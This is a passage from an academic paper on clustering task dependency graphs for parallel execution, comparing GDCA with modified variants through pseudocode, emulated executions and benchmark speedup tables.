to be released to become ready, and it releases its dependencies once it is entirely completed and not after the completion of each task that composes it. This means the number of dependencies that exists originally between the tasks of two macro-tasks is not relevant, because if there is one or many then the two macro-tasks are linked, as illustrated by the Fig. 3. A side effect is that creating macro-tasks delays the release of the dependencies. In fact, the release of the dependencies can be delayed by the complete duration of the macro-task compared to execution without clustering and this delay also implies a reduction of the degree of parallelism. However, if the degree of parallelism at a global level remains high, the execution could still be faster because it is expected that the clustering will reduce the overhead. DAG OF TASKS CLUSTERING Modification of the GDCA Before entering into the details of our approach, we first give a general description of the original algorithm. The algorithm continuously maintains a list of ready tasks by processing the graph while respecting the dependencies. It works on the ready tasks only to build a cluster. By doing so, all the predecessors of the ready tasks are already assigned to a cluster, and all the ready tasks and their successors are not assigned to any cluster. This strategy ensures that no cycle will be created while building the clusters. To create a cluster, the algorithm first picks one of the ready tasks, based on a heuristic that we call the initial-selection. Then it iteratively aggregates some ready nodes to it until the cluster reaches M nodes, using what we call aggregate-selection. Every time a node is put in a cluster, the algorithm releases its dependencies and potentially adds new ready tasks to the list. Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 7/26 https://peerj.com https://doi.org/10.7717/peerjcs.247/fig-3 http://dx.doi.org/10.7717/peerj-cs.247 x (a) (b) (d)(c) y z vu x y z vu x y z vu x y z vu Figure 4 Illustration of the GDCA. Ready tasks are in blue, tasks assigned to the new cluster are in red. (A) Nodes x, y and z are ready, and here y is selected as first node for the current cluster p to create (initial-selection). (B) Nodes x, v and z are ready, and we have to select the next nodes to put in p (agregate-selection). If the criteria to decide is the number of predecessors in the cluster, then v is selected. (C) Nodes x and z are ready, and both nodes have zero predecessors in p. If we look at the successors they have in common with p, then u is selected. (D) node z is ready, and it might have no predecessors or successors in common with nodes in p. If we use a strict cluster size, then z should be added to p, otherwise, the cluster p is done. Full-size DOI: 10.7717/peerjcs.247/fig-4 The initial-selection and the aggregate-selection are the two heuristics that decide which node to select to start a cluster, and which nodes to add to the ongoing cluster. The initial-selection picks the node with the lowest depth, where the depth of a node is the longest distance to the roots. The aggregate-selection picks the tasks that has the largest number of predecessors in the new cluster. For both selections, the lowest ids is selected in case of equality to enforce a strict order of the nodes. In Figure 4, we provide an example of clustering that illustrates why we potentially need additional heuristics for the aggregate-selections. In Fig. 4B both nodes x and z are ready and could be selected, but node z has no connections with the new cluster. The original algorithm does not have a mechanism to detect this situation. Second, in Fig. 4D since z has no connections with the new cluster, it could be disadvantageous to add it. If we imagine the case where a graph is composed of two independent parts, connecting them is like putting a synchronization on their progress. On the other hand, if we need clusters of a fixed size, as it is the case in the original algorithm, there is no choice and z must be put in the cluster. In Appendix, we provide two graphs that were clustered using GDCA, see Figs. A1 and A2. Change in the initial-selection. We propose to select the node using the depth (like in the original algorithm), but also to use the number of predecessors. Our objective is to privilege the nodes with the highest number of predecessors that we consider more critic. Change in the aggregate-selection. To select the next node to add to a cluster, we choose the node with the highest number of predecessors in the cluster, but in case of equality, we compare the number of nodes in common between the successors of the cluster and the successors of the candidates. For instance, in Fig. 4A, the node x has one common successor with the new cluster (node u), but as the number of predecessors in the cluster is more significant v is selected. Then, in Fig. 4B, x has one common successor, and z none, therefore, with this heuristic x is selected. Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 8/26 https://peerj.com https://doi.org/10.7717/peerjcs.247/fig-4 http://dx.doi.org/10.7717/peerj-cs.247 Flexible cluster size. If no nodes in the ready list have a predecessor in the cluster or a common successor, then we can decide to stop the construction of the current cluster and start a new one, which means that some clusters will have less than M nodes. This heuristic would stop the construction of the new cluster in Fig. 4D. Full algorithm. The complete solution is provided in Algorithm 1. The GDCA algorithm is annotated with our modifications and we dissociate GDCAv2 that includes the change in the nodes selections, and GDCAws that includes the stop when no ready node has a connection with the new cluster. The main loop, line 6, ensures that the algorithm continues until there are no more ready nodes in the list. The initial-selection is done at line 12, where the algorithm compares the depth, the number of predecessors and the ids of each node. This can be implemented using a sort or simply by selecting the best candidate as the list will be rearranged and updated later in the algorithm. At line 16, the dependencies of the master node are released. If some of its predecessors become ready (line 18), they are put in the list and their counters of predecessors in the new cluster are incremented. Otherwise (line 21), they are put in a set that includes all the successors of the new cluster. This set is used line 27, to count the common successors between the cluster and each ready node. In an optimized implementation, this could be done only if needed, i.e. if the best nodes have equal number of predecessors in the cluster during the aggregate-selection. At line 33, the ready nodes are sorted using their number of predecessors in the cluster, their number of common successors with the cluster and their ids. If we have flexible cluster size, we can stop the construction of the new cluster (line 35) if we consider that no nodes are appropriate. Otherwise, the next node is added to the cluster, its dependencies are released and the counter updated (from line 38 to line 38). In Appendix, we provide an example of emulated execution of a DAG using this method, see Fig. A3. Emulating the execution of DAG of tasks Iterating on a DAG to emulate an execution with a limited number of processing units is a classical algorithm. However, how the overhead should be defined and included in the model is still evolving (Kestor, Gioiosa & Chavarra-Miranda, 2015). We propose to take into account three different overheads: one overhead per task execution, and two overheads for the release and the selection of a ready task. Using an overhead per task is classically admitted in the majority of models. In our case, this overhead is a constant per task - no matter the task’s size - and only impacts the worker that will execute the task. For example, if the overhead per task is Ot and a worker starts the execution of a task of duration d at time t, the worker will become available at t+d+Ot . The accumulated cost duration implied by this overhead decreases proportionally with the number of tasks (i.e., the more tasks per cluster the less total overhead). Second, our model includes an overhead every time a task is released or assigned to a worker. When a task is released, it has to be pushed in the ready task list, and this implies either some synchronization or lock-free mechanisms with a non-negligible cost. The same happens when a task is popped from the list and assigned to a worker. Moreover, the Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 9/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 pushes and pops compete to modify the ready list, and in both cases, this can be seen as a lock with only one worker at a time that accesses it. As a result, in our model, we increment the global timestamp variable every time the list is modified. We provide our solution in Algorithm 2, which is an extension of the DAG execution algorithm with a priority queue of workers. The workers are stored in the queue based on their next availability and we traverse the graph while maintaining the dependencies and a list of ready tasks. At line 5, we initialize the current time variable using the number of ready tasks and the push overhead, considering that all these tasks are pushed in the list and this makes it impossible to access it. Then, at line 8, we assign tasks to the available workers and store them in the priority queues using the cost of each task and the overhead per task, see line 12. Then, in the core loop, line 16, we pick the next available worker, release the dependencies for the task it was computed, and assign tasks to idle workers (until there are no more tasks or idle workers). Finally, we wait for the last workers to finish at line 34. Our execution model is used to emulate the execution of a DAG on a given architecture, but we also use it to found the best cluster granularity. To do so, we emulate executions starting with a size M =2 and we increase M and keep track of the best granularity found so far B. We stop after granularity 2×B. The idea is that we will have a speedup as we increase the granularity until we constraint too much the degree of parallelism. But in order not to stop at the first local minima (the first time an increase of the granularity results in an increase of the execution time), we continue to test until the granularity equals two times the best granularity we have found. EXPERIMENTAL STUDY We evaluate our approach on emulated executions and on a real numerical application. Emulated executions Graph data-set. We use graphs of different properties that we summarize in Table 1. They were generated from the Polybench collection (Grauer-Gray et al., 2012), the daggen tool (Suter, 2013) or by ourselves. The graphs from daggen are complex in the sense that their nodes have important number of predecessors/successors and that the cost of the tasks are significant and of large intervals. The graphs with names starting by Chukrut are the test cases for the real application. Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 10/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 ALGORITHM 1: GDCA algorithm, where M is the desired cluster size. GDCAv2 includes the lines in black underlined-bold. GDCA-ws includes the lines in gray. 1 function cluster(G=(V ,E), M) 2 ready←Get_roots(G) // Gets the roots 3 depths←Distance_from_roots(G, ready) // Gets the distance from roots 4 count_deps_release = ∅ // # of released dependencies 5 cpt_cluster = 0 6 while ready is not empty do 7 count_pred_master = ∅ // # predecessors in the new cluster 8 count_next_common = ∅ // # common successors 9 // Sort by, first increasing depths, second decreasing number 10 // of predecessors, third increasing ids (to ensure a strict 11 // order) 12 ready.sort() 13 master = ready.pop_front() 14 clusters[master] = cpt_cluster 15 master_boundary = ∅ 16 for u∈ successors[master] do 17 count_deps_release[u] += 1 18 if count_deps_release[u] equal |predecessors[u]| then 19 ready.insert(u) 20 count_pred_master[u] = 1 21 else 22 master_boundary.insert(u) 23 end 24 end 25 cluster_size = 1 26 while cluster_size < M do 27 for u∈ ready do 28 count_next_common[u] = | successors[u]∩master_boundary | 29 end 30 // Sort by, first decreasing count_pred_master, second 31 // increasing depths, third decreasing count_next_common, 32 // fourth increasing ids (to ensure a strict order) 33 ready.sort() 34 next = ready.front(); 35 if count_pred_master[next] is 0 AND count_next_common[next] is 0 then 36 break; 37 end 38 ready.pop_front() 39 cluster_size += 1 40 clusters[next] = cpt_cluster 41 for u∈ successors[next] do 42 count_deps_release[u] += 1 43 if count_deps_release[u] equal |predecessors[u]| then 44 ready.insert(u) 45 count_pred_master[u] = 0 46 for v∈predecessors[u] do 47 if clusters[v] == clusters[master] then 48 count_pred_master[u] += 1 49 end 50 end 51 master_boundary.erase(u) 52 else 53 master_boundary.insert(u) 54 end 55 end 56 end 57 cpt_cluster += 1 58 end Hardware. We consider four systems in total, two imaginary hardware with two type of overhead low (L) and high (H), with the following properties: Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 11/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 ALGORITHM 2: Emulate an execution of G using W workers. The overheads are push_overhead, pop_overhead and task_overhead. 1 function Emulate_execution(G=(V ,E), W , push_overhead, pop_overhead, task_overhead) 2 idle_worker← list(0, W-1) 3 current_time←0 4 ready←Get_roots(G) 5 current_time←push_overhead× ready.size() 6 nb_computed_task←0 7 workers← empty_priority_queue() 8 while ready is not empty AND idle_worker is not empty do 9 task← ready.pop() 10 worker← idle_worker.pop() 11 current_time← current_time + pop_overhead 12 workers.enqueue(worker, task, current_time, costs[u] + task_overhead) 13 nb_computed_task←nb_computed_task + 1 14 end 15 deps←0 16 while nb_computed_task 6= |tasks|do 17 [task, worker, end]←workers.dequeue() 18 current_time←max(current_time, end) 19 idle_worker.push(worker) 20 for v∈ successors[u] do 21 deps[v]←deps[v] + 1 22 if |deps[v]|= |predecessors[v]| then 23 ready.push(v) 24 end 25 end 26 while ready is not empty AND idle_worker is not empty do 27 task← ready.pop() 28 worker← idle_worker.pop() 29 current_time← current_time + pop_overhead 30 workers.enqueue(worker, task, current_time, costs[u] + task_overhead) 31 nb_computed_task←nb_computed_task + 1 32 end 33 end 34 while nb_computed_task 6= |tasks|do 35 [task, worker, end]←workers.dequeue() 36 current_time←max(current_time, end) 37 end 38 return current_time • Config-40-L: System with 40 threads and overhead per task 0.1, per push 0.2 and per pop 0.2. • Config-40-H: System with 40 threads and overhead per task 2, per push 1 and per pop 1. • Config-512-L: System with 512 threads and overhead per task 0.1, per push 0.2 and per pop 0.2. • Config-512-H: System with 512 threads and overhead per task 4, per push 2 and per pop 2. The given overheads are expressed in terms of proportion of the total execution time of a graph. Consequently, if D is the total duration of a graph (the sum of the duration of the N tasks), and if the overhead is Ot , then the overhead per task is given by D×Ot /N . Increasing granularity. In Figure 5, we show the duration of the emulated executions as the granularity increases for twelve of the graphs. As expected the execution time decreases as the granularity increases in most cases since the impact of the overhead is mitigated. Using 512 threads (Config-512-L/red line) instead of 40 (Config-40-L/green line) does not speed up the execution when the overhead is low, and this is explained by the fact that the average degree of parallelism is lower than 512 for most graphs. In Figs. 5H and 5K, the Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 12/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 execution time shows a significant variation depending on the clustering size. This means that for some cluster sizes several workers are not efficiently used by being idle (waiting for another a worker to finish its task and release the dependencies), while for some other sizes the workload per worker is well balanced and the execution more efficient. Note that we increase the granularity up to two times the best granularity we have found, and this appears to be a good heuristic to catch the best cluster size without stopping at the first local minima. Details. In Table 2, we provide the best speedup we have obtained by taking execution times without clustering as reference. We provide the results for the GDCA and the updated method (GDCAv2), and also show the best granularity for each case. The GDCAv2 provides a speedup over GDCA in many cases. For instance, for the daggen’s graphs the GDCAv2 method is faster in most cases. In addition, there are cases where the GDCAv2 provide a significant speedup, such as the graphs polybench - kernel trmm, polybench - kernel jacobi 2d imper and polybench - kernel gemvr. For the Config-512-H configuration and the polybench - kernel gemvr graph, the GDCA has a speedup of 24.73, and GDCAv2 83.47. However, there are still many cases where GDCA is faster, which means that to cluster a graph from a specific application it is required to try and compare both methods. In addition, this demonstrates that while our modifications of GDCA seem natural when we look at the graph at a low level, they do not necessarily provide an improvement at a global level due to corner cases. Moreover, the ids of the nodes are more important in GDCA than in GDCAv2, and this information is usually not random and includes the order of construction of the tasks. Concerning GDCAws, the method is not competitive for most of the graphs. However, it provides a significant speedup for the Chukrut graphs, which are the ones use in our real application. Real application Hardware configuration We use the following computing nodes: • Intel-24t : 4 × Intel(R) Xeon(R) CPU E5-2680 v3 @ 2.50GHz, with caches L1 32K, L2256K and L3 15360K (24 threads in total). • Intel-32t : 2 × Intel(R) Xeon(R) Gold 6142 CPU @ 2.60GHz V4, with caches L1 32K, L21024K and L3 22528K (32 threads in total). Software configuration. We use the GNU C compiler 7.3.0. We parallelize using OpenMP threads and we do not use any mutex during the execution. We only use lock-free mechanisms implemented with C11 atomic variables to manage the dependencies and the list of ready tasks, which is actually an array updated using atomics. Test cases. The two test cases represent a 2D mesh that has the shape of a disk with sizes 40 and 60. The details of the two corresponding graphs are provided in Table 1 under the names Chukrut - disque40 and Chukrut - disque60. The execution of a single task takes around 1.5 ·10−5s. To estimate the overhead, we take the execution time in sequential T1 and the execution time using a third of the available threads Tx and do Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 13/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 Table 1 Details of the studied graphs. The degree of parallelism is obtained by iterating on the graph, while respecting the dependencies, and measure the size of the ready task list (the average size or the largest size found during the execution). Name #vertices #edges #Predecessors Total cost Cost Degree of parallelism avg max min avg max avg max createdag - agraph-2dgrid-200 39999 79202 1.980 2 39999 1 1 1 100.5 398 createdag - agraph-deptree-200 10100 19900 1.970 2 10100 1 1 1 50.5 100 createdag - agraph-doubletree-200 10100 19900 1.970 2 10100 1 1 1 50.5 100 createdag - agraph-tree-200 20100 39800 1.980 2 20100 1 1 1 100.5 200 Chukrut - disque40 19200 38160 1.99 2 19200 1 1 1 80.3347 120 Chukrut - disque60 43200 86040 1.99 2 43200 1 1 1 120.334 180 daggen - 1000-0 5-0 2-4-0 8 1000 6819 6.819 42 2.2e+14 3.1e+08 2.2e+11 1.3e+12 27.7 52 daggen - 128000-0 5-0 2-2-0 8 128000 11374241 88.861 549 3.0e+16 2.6e+08 2.3e+11 1.4e+12 362.6 641 daggen - 16000-0 5-0 8-4-0 8 16000 508092 31.756 97 3.7e+15 2.7e+08 2.3e+11 1.4e+12 124.03 155 daggen - 4000-0 2-0 8-4-0 8 4000 6540 1.635 7 9.0e+14 2.6e+08 2.2e+11 1.4e+12 7.8 15 daggen - 64000-0 2-0 2-4-0 8 64000 169418 2.647 31 1.5e+16 2.6e+08 2.3e+11 1.4e+12 11.84 23 polybench - kernel 2 mm 14600 22000 1.507 40 14600 1 1 1 286.275 600 polybench - kernel 3 mm 55400 70000 1.264 40 55400 1 1 1 780.282 1400 polybench - kernel adi 97440 553177 5.677 7 97440 1 1 1 43.4806 86 polybench - kernel atax 97040 144900 1.493 230 97040 1 1 1 220.045 440 polybench - kernel covariance 98850 276025 2.792 70 98850 1 1 1 686.458 3500 polybench - kernel doitgen 36000 62700 1.742 2 36000 1 1 1 3000 3000 polybench - kernel durbin 94372 280870 2.976 250 94372 1 1 1 2.96088 250 polybench - kernel fdtd 2d 70020 220535 3.150 4 70020 1 1 1 1167 1200 polybench - kernel gemm 340200 336000 0.988 1 340200 1 1 1 4200 4200 polybench - kernel gemver 43320 71880 1.659 120 43320 1 1 1 179.008 14400 polybench - kernel gesummv 125750 125500 0.998 1 125750 1 1 1 499.008 500 polybench - kernel jacobi 1d imper 79600 237208 2.980 3 79600 1 1 1 398 398 polybench - kernel jacobi 2d imper 31360 148512 4.736 5 31360 1 1 1 784 784 polybench - kernel lu 170640 496120 2.907 79 170640 1 1 1 1080 6241 polybench - kernel ludcmp 186920 537521 2.876 80 186920 1 1 1 53.7126 6480 polybench - kernel mvt 80000 79600 0.995 1 80000 1 1 1 400 400 polybench - kernel seidel 2d 12960 94010 7.254 8 12960 1 1 1 62.3077 81 polybench - kernel symm 96000 93600 0.975 1 96000 1 1 1 2400 2400 polybench - kernel syr2k 148230 146400 0.988 1 148230 1 1 1 1830 1830 polybench - kernel syrk 148230 146400 0.988 1 148230 1 1 1 1830 1830 polybench - kernel trisolv 80600 160000 1.985 399 80600 1 1 1 100.75 400 polybench - kernel trmm 144000 412460 2.864 80 144000 1 1 1 894.41 1410 B ram as and K etterlin (2020),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.247 14/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 0 10 20 30 40 50 60 70 Granularity 104 105 Te m ps (s ) disque60.dot (a) 2 3 4 5 6 7 8 9 10 Granularity 1016 6 × 1015 2 × 1016 3 × 1016 Te m ps (s ) generated-dag-64000-0_2-0_2-4-0_8.dot (b) 0 200 400 600 800 Granularity 103 104 105 Te m ps (s ) kernel_atax.dot (c) 0 10 20 30 40 50 60 70 80 Granularity 105 4 × 104 6 × 104 2 × 105 3 × 105 Te m ps (s ) kernel_durbin.dot (d) 0 10 20 30 40 50 60 70 Granularity 104 105 Te m ps (s ) kernel_trmm.dot (e) 5 10 15 20 25 Granularity 104 Te m ps (s ) kernel_seidel_2d.dot (f) 0 10 20 30 40 50 Granularity 104 Te m ps (s ) kernel_jacobi_2d_imper.dot (g) 0 50 100 150 200 Granularity 103 104 105 Te m ps (s ) kernel_gemver.dot (h) 0 10 20 30 40 50 60 70 Granularity 104T em ps (s ) agraph-2dgrid-200.dot (i) 0 100 200 300 400 500 Granularity 103 104 105 Te m ps (s ) kernel_covariance.dot (j) 0 10 20 30 40 50 Granularity 104 105 Te m ps (s ) kernel_fdtd_2d.dot (k) Config 40/0.1/0.2/0.2 Config 40/2.0/1.0/1.0 Config 512/0.1/0.2/0.2 Config 512/4.0/2.0/2.0 GDCA GDCAv2 (l) Legend Figure 5 Emulated execution times against cluster granularity G for different test cases, different ma- chine configurations (colors ----) and different strategies (nodes•N). (A) disque60. (B) generated-dag- 4000-0.2-0.2-4-0.8. (C) kernel atax. (D) kernel durbin. (E) kernel trmm. (F) kernel seidel. (G) kernel ja- cobi 2D imper. (H) kernel gemver. (i) agraph 2dgrid-200. (J) kernel covariance. (K) kernel fdtf 2D. Full-size DOI: 10.7717/peerjcs.247/fig-5 O=(Tx×x−T1)/T1. We obtained an overhead of 3 on Intel-24t and of 3.5 on Intel-32t. We dispatch this overhead one half for the overhead per task, and one quarter for the push/pop overheads. The execution times are obtained from the average of 6 executions. We increase the granularity up to M =100 in order to show if our best granularity selection heuristic would miss the best size. Results. In Fig. 6, we provide the results for the two test cases on the two computing nodes. Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 15/26 https://peerj.com https://doi.org/10.7717/peerjcs.247/fig-5 http://dx.doi.org/10.7717/peerj-cs.247 Table 2 Speedup obtained by clustering the graphs on emulated executions for GDCA and GDCAv2. The best granularity for the different graphs is provided, and the speedup is in bold when one of the two clustering strategies appears more efficient than the other for a given hardware. GDCAws is slower in most cases, except for the graphs from createdag and Chukrut. For the configuration Config-512-H, GDCAws get a speedup of 34 for Chukrut - disque40 and of 44 for Chukrut - disque60. Name Config-40-L Config-40-H Config-512-L Config-512-H GDCA GDCAv2 GDCA GDCAv2 GDCA GDCAv2 GDCA GDCAv2 G Sp. G Sp. G Sp. G Sp. G Sp. G Sp. G Sp. G Sp. createdag - agraph-2dgrid-200 9 5.775 16 5.821 36 14.79 36 13.86 9 5.786 16 6.078 36 21.76 36 22.57 createdag - agraph-deptree-200 6 4.158 4 3.798 16 12.75 16 12.75 6 4.158 4 3.801 25 16.6 25 16.21 createdag - agraph-doubletree-200 6 4.158 4 3.798 16 12.75 16 12.75 6 4.158 4 3.801 25 16.6 25 16.21 createdag - agraph-tree-200 16 7.905 16 7.905 36 23.68 36 24.06 16 8.978 16 8.976 64 37.5 64 37.47 Chukrut - disque40 16 7.62 16 7.62 25 21.91 25 21.91 16 7.629 16 7.626 25 23.91 25 23.91 Chukrut - disque60 16 10.9 16 10.9 36 30.6 36 30.6 16 11.35 16 11.34 36 34.22 36 34.22 daggen - 1000-0 5-0 2-4-0 8 2 1.425 2 1.575 3 2.34 4 2.221 2 1.425 2 1.575 6 2.704 5 2.858 daggen - 128000-0 5-0 2-2-0 8 2 1.835 2 1.872 4 2.88 5 2.994 2 1.839 2 1.875 7 3.517 6 3.689 daggen - 16000-0 5-0 8-4-0 8 2 1.787 2 1.806 3 2.528 3 2.646 2 1.786 2 1.805 4 2.955 4 3.1 daggen - 4000-0 2-0 8-4-0 8 2 1.066 2 1.08 3 1.95 3 1.97 2 1.066 2 1.08 4000 3.998 4000 3.998 daggen - 64000-0 2-0 2-4-0 8 2 1.214 2 1.203 3 2.085 3 2.115 2 1.214 2 1.203 4 2.476 4 2.555 polybench - kernel 2 mm 18 11.71 18 11.71 62 41.6 57 35.88 62 22.3 31 20.52 124 76.65 130 59.72 polybench - kernel 3 mm 20 13.05 20 13.05 102 48.3 52 43.05 51 30.82 52 28.54 153 97.71 154 77.7 (continued on next page) B ram as and K etterlin (2020),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.247 16/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 Table 2 (continued) Name Config-40-L Config-40-H Config-512-L Config-512-H GDCA GDCAv2 GDCA GDCAv2 GDCA GDCAv2 GDCA GDCAv2 G Sp. G Sp. G Sp. G Sp. G Sp. G Sp. G Sp. G Sp. polybench - kernel adi 10 6.045 10 6.161 23 15.39 24 16.19 10 6.045 10 6.161 30 20.81 34 21.43 polybench - kernel atax 35 13.84 35 13.84 105 55.41 105 55.41 63 42.83 63 42.83 420 150.3 420 150.3 polybench - kernel covariance 17 13.6 17 13.6 68 46.93 143 60.2 142 48.29 142 48.29 284 178.3 211 144.7 polybench - kernel doitgen 960 14.77 960 14.77 960 69.37 960 69.37 120 59.98 120 59.98 360 188.5 360 188.5 polybench - kernel durbin 6 1.756 12 1.806 24 4.954 24 5.322 6 1.752 12 1.809 30 7.983 40 8.594 polybench - kernel fdtd 2d 8 7.116 10 8.339 15 12.39 20 16.74 8 7.116 10 8.34 17 15.26 26 21.49 polybench - kernel gemver 9 8.349 27 12.14 19 17.86 117 45.44 9 8.398 39 24.19 27 24.73 117 83.47 polybench - kernel gesummv 31 14.44 31 14.44 114 61.21 114 61.21 503 83.4 503 83.4 503 333.8 503 333.8 polybench - kernel jacobi 1d imper 15 7.114 12 8.295 32 19.84 32 20.1 15 7.114 12 8.295 32 28.17 60 28.7 polybench - kernel jacobi 2d imper 5 4.853 7 6.046 11 8.184 18 11.85 5 4.853 7 6.046 11 9.841 24 18.02 polybench - kernel lu 16 11.47 17 9.404 39 24.65 39 22.85 22 13.69 16 11.02 86 38.65 89 33.95 polybench - kernel ludcmp 17 6.668 13 6.379 48 16.48 32 16.96 17 7.366 17 6.895 48 24.71 60 25.38 polybench - kernel mvt 400 15.62 400 15.62 400 70.99 400 70.99 200 88.87 200 88.87 600 280.7 600 280.7 polybench - kernel seidel 2d 4 2.319 4 2.659 6 4.219 8 4.856 4 2.319 4 2.659 8 5.705 12 6.772 polybench - kernel symm 2400 15.89 2400 15.89 2400 77.36 2400 77.36 200 97.94 200 97.94 600 308.7 600 308.7 polybench - kernel syr2k 27 14.24 27 14.24 3726 77.85 3726 77.85 324 116.9 324 116.9 810 383.5 810 383.5 polybench - kernel syrk 27 14.24 27 14.24 3726 77.85 3726 77.85 324 116.9 324 116.9 810 383.5 810 383.5 polybench - kernel trisolv 8 4.732 8 4.732 25 15.14 25 15.14 9 4.87 9 4.87 25 18.61 25 18.61 polybench - kernel trmm 11 8.255 14 10.6 25 15.94 29 21.6 11 8.622 14 11.44 32 20.68 37 29 B ram as and K etterlin (2020),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.247 17/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 GDCA GDCAws GDCAv2 Emulation with overhead Real execution (a) Legend 0 20 40 60 80 100 Granularity (M) 100 101 Sp ee du p Intel-24t-4s - Size 40 (b) 0 20 40 60 80 100 Granularity (M) 100 101 Sp ee du p Intel-24t-4s - Size 60 (c) 0 20 40 60 80 100 Granularity (M) 100 101 Sp ee du p Intel-32t-2s - Size 40 (d) 0 20 40 60 80 100 Granularity (M) 100 101 Sp ee du p Intel-32t-2s - Size 60 (e) Figure 6 Speedup obtained for the two test cases with different clustering strategies. We show the speedup obtained from emulated executions (dashed lines) and from the real executions (plain lines). (A) Inter-24t-4s Size 40. (B) Inter-24t-4s Size 60. (C) Inter-32t-2s Size 40. (D) Inter-32t-2s Size 60. Full-size DOI: 10.7717/peerjcs.247/fig-6 In the four configurations, the emulation of GDCAws (blue dashed line) is too optimistic compared to the real execution (blue line): on Intel-24t, Figs. 6B and 6C, GDCAws performed poorly (blue line), but on Intel-32t, Figs. 6D and 6E, GDCAws is efficient for large granularities. However, even if it is efficient on average on Intel-32t, it never provides the best execution. This means that having a flexible cluster size is not the best approach for these graphs and that having fewer clusters but of a fixed size (even if it adds more dependencies) seems more appropriate. Concerning the emulation, our model does not catch the impact of having clusters of different sizes. The emulation of GDCA is more accurate (dashed green line) when we compare it with the real execution (green line), even if the real execution is always underperforming. However, the global shape is correct and, importantly, the performance peaks that happen Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 18/26 https://peerj.com https://doi.org/10.7717/peerjcs.247/fig-6 http://dx.doi.org/10.7717/peerj-cs.247 in the emulation also happen in the real execution. This means that we can use emulated executions to find the best clustering size for the GDCA. In terms of performance, GDCA provides the best execution on the Intel-32t for M between 10 and 20. The emulation of GDCAv2 is accurate for the Intel-24t (Figs. 6B and 6C) with a superimposition of the plots (dashed/plain purple lines). However, it is less accurate for the Intel-32t (Figs. 6D and 6E) where the real execution is underperforming compared to the emulation. As for the GDCA, the peaks of the emulation of the GDCAv2 concord with the peaks of the real executions. GDCAv2 provides the best performance on the Intel-24t, for M between 15 and 20. GDCA and GDCAv2 have the same peaks; therefore, for some cluster sizes the degree of parallelism is much better and the filling of the workers more efficient. But GDCAv2 is always better on the Intel-32t, while on the Intel-24t both are very similar except that GDCA is faster at the peaks. While the difference is not necessarily significant this means that the choice between GDCA and GDCAv2 is machine-dependent. CONCLUSION The management of the granularity is one of the main challenges to achieve high- performance using the tasks and dependencies paradigm. GDCA allows controlling the granularity of the tasks by grouping them to obtain a macro-DAG. In this paper, we have presented GDCAv2 and GDCAws two modified version of GDCA. We evaluated the benefit of GDCA and GDCAv2 on emulated executions. We have demonstrated that our modifications allow obtaining significant speedup in several cases but that it remains unknown which of the two methods will give the best results. We evaluated the three algorithms on a real application and we have demonstrated that clustering the DAG allowed to get a speedup of 7 compared to executions without clustering. We were able to find the best granularity using emulated execution based on a model that incorporates different overheads. As a perspective, we would like to plug our algorithm directly inside an existing task-based runtime system to cluster the DAG on the fly during the execution. This would require a significant programming effort but will open the study of more applications and certainly lead to improving not only the selection of the parameters but also the estimation of the costs and the overheads. In addition, we would like to adapt the aggregate-selection during the clustering process in order to always use the best of GDCA and GDCAv2. ACKNOWLEDGEMENTS The experiments presented in this paper were carried out using the PlaFRIM experimental testbed, supported by Inria, CNRS (LABRI and IMB), Université de Bordeaux, Bordeaux INP and Conseil Régional d’Aquitaine (see https://www.plafrim.fr/). APPENDIX Figures A1 and A2 are examples of graph clustering with our method. Figure A3 shows an example of a graph clustering and an emulated execution. Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 19/26 https://peerj.com https://www.plafrim.fr/ http://dx.doi.org/10.7717/peerj-cs.247 240 [1/7] 241 [1/7] 242 [1/30] 224 [1/7] 225 [1/7] 226 [1/25] 208 [1/6] 209 [1/6] 210 [1/25] 192 [1/6] 193 [1/6] 194 [1/21] 176 [1/6] 177 [1/6] 178 [1/21] 160 [1/5] 161 [1/5] 162 [1/17] 144 [1/5] 145 [1/5] 146 [1/17] 128 [1/5] 129 [1/5] 130 [1/13] 112 [1/4] 113 [1/4] 114 [1/13] 96 [1/4] 97 [1/4] 98 [1/11] 80 [1/4] 81 [1/4] 82 [1/11] 64 [1/3] 65 [1/3] 66 [1/8] 48 [1/3] 49 [1/3] 50 [1/8] 32 [1/3] 33 [1/3] 34 [1/8] 16 [1/2] 17 [1/2] 18 [1/7] 15 [1/2] 31 [1/22] 47 [1/22] 14 [1/2] 30 [1/22] 46 [1/22] 13 [1/2] 29 [1/22] 45 [1/22] 12 [1/2] 28 [1/16] 44 [1/16] 11 [1/1] 27 [1/16] 43 [1/16] 10 [1/1] 26 [1/16] 42 [1/16] 9 [1/1] 25 [1/12] 41 [1/12] 8 [1/1] 24 [1/12] 40 [1/12] 7 [1/1] 23 [1/12] 39 [1/12] 6 [1/1] 22 [1/9] 38 [1/9] 5 [1/0] 21 [1/9] 37 [1/9] 4 [1/0] 20 [1/9] 36 [1/9] 3 [1/0] 19 [1/7] 35 [1/8] 2 [1/0] 1 [1/0] 51 [1/8] 52 [1/10] 53 [1/10] 54 [1/10] 55 [1/14] 56 [1/14] 57 [1/14] 58 [1/19] 59 [1/19] 60 [1/19] 61 [1/26] 62 [1/26] 63 [1/26] 67 [1/8] 68 [1/10] 69 [1/10] 70 [1/10] 71 [1/14] 72 [1/14] 73 [1/14] 74 [1/19] 75 [1/19] 76 